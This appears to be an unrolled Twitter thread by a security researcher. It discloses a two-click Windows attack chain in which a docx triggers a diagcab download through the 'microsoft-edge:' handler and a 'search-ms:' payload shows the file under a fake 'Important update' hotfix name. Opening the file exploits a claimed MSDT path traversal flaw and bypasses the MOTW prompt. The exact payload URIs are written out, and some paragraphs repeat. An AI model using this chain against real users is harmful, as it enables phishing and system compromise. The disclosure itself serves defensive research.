microsoft-edge + ms-search + MSDT path traversal 0day = fun of 2-clicks (one click additional due to Protected View if docx is coming from remote btw).
This is the full chain:
1) Open a docx which connects to a remote server to download a diagcab file by MS Edge. This uses the protocol handler "microsoft-edge". So easy as this: "microsoft-edge:http://127.0.0.1:8081/foo.html"
2) Use "ms-search" trick to open folder Downloads.
1) Open a docx which connects to a remote server to download a diagcab file by MS Edge. This uses the protocol handler "microsoft-edge". So easy as this: "microsoft-edge:http://127.0.0.1:8081/foo.html"
2) Use "ms-search" trick to open folder Downloads.
Note i don't know username but i'm using what MS calls "Constants for Common Folders": location:shell%3aDownloads.
Full payload is: "search-ms:query=KB5002076-hotfix.diagcab&crumb=location:shell%3aDownloads&displayname=Important%20update"
Source: docs.microsoft.com/en-us/windows/…
Full payload is: "search-ms:query=KB5002076-hotfix.diagcab&crumb=location:shell%3aDownloads&displayname=Important%20update"
Source: docs.microsoft.com/en-us/windows/…
3) Double-click the file "KB5002076-hotfix.diagcab" to exploit that path traversal 0day in MSDT.
Bonuses:
1) It's not needed to use a remote location for "ms-search". We can use folder Downloads.
2) As the downloaded file is diagcab, there's no prompt to open an executable in a remote location. And MOTW prompt bypass.
1) It's not needed to use a remote location for "ms-search". We can use folder Downloads.
2) As the downloaded file is diagcab, there's no prompt to open an executable in a remote location. And MOTW prompt bypass.
For people who wonder if this is related to #Follina. It's another 0day. Context:
https://twitter.com/j00sean/status/1532416426702786560
• • •
Missing some Tweet in this thread? You can try to
force a refresh
